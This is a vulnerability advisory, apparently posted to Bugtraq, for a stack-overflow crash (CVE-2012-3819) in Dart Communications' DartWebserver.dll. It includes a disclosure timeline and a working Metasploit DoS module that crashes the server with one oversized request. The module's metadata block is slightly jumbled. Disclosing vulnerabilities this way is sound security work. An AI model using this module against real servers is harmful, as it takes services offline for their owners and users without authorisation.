Overview =============== DartWebserver.Dll is an HTTP server provided by Dart Comunications (dart.com). It is distributed intheir PowerTCP/Webserver For ActiveX product and likely other similar products. "Build web applications in any familiar software development environment. Use WebServer for ActiveX to add web-based access to traditional compiled applications." Version 1.9 and prior is vulnerable to a stack overflow exception, these maybe generated by producing large requests to the application, e.g. "a" * 5200000 + "\n\n" Analysis =============== During the processing of incoming HTTP requests the server collects data until it encounters a "\n\n" sentinel. If the request is large, multiple copies are made and stored on the stack, this consumes the amount of stack space available to the process quickly, leading to a stack overflow exception being thrown. This exception is not handled and will typically lead to the termination of the parent process. Some variations may exist per system depending on pre-existing memory conditions and modification of Proof Of Concept (PoC) code may be necessary to reproduce the exception. Timeline =============== 10/20/2011 - Discovered the bug in an affected vendor application 10/20/2011 - Contacted affected vendor 10/21/2011 - Affected vendor replies stating they can not get the product vendor to create a fix 06/29/2012 - CVE assignment 08/08/2012 - Contacted product vendor providing specifics 08/20/2012 - Product vendor created an issue number (#5654) for the bug, but reply "there are not immediate plans to resolve the issue" 09/28/2012 - Posting to bugtraq, for the first time ever ;-) PoC (MSF Module) =============== require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Description' => %q{ 'Name' => 'Dart Webserver <= 1.9.0 Stack Overflow', Dart Webserver from Dart Communications throws a stack overflow exception when processing large requests. } , 'Author' => [ 'catatonicprime' ], 'Version' => '$Revision: 15513 $', 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-3819' ], ], 'DisclosureDate' => '9/28/2012')) register_options([ Opt::RPORT(80), OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust', '520000' ]) ]) end def run serverIP = datastore['RHOST'] if (datastore['RPORT'].to_i != 80) serverIP += ":" + datastore['RPORT'].to_s end size = datastore['SIZE'] print_status("Crashing the server ...") request = "A" * size + "\r\n\r\n" connect sock.put(request) disconnect end end